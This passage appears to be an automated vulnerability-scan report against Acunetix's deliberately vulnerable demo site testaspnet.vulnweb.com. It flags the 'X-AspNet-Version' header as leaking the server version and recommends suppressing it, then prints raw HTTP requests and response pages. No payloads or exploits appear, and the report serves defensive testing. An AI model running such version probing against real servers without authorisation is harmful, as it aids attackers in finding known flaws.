XRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q90tjPbD69UwpHdROB4Qqxfz1aHXA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 17827Response body (17827 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9jwc/cRnTJwdNTwN8SPSTaigKqpw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" 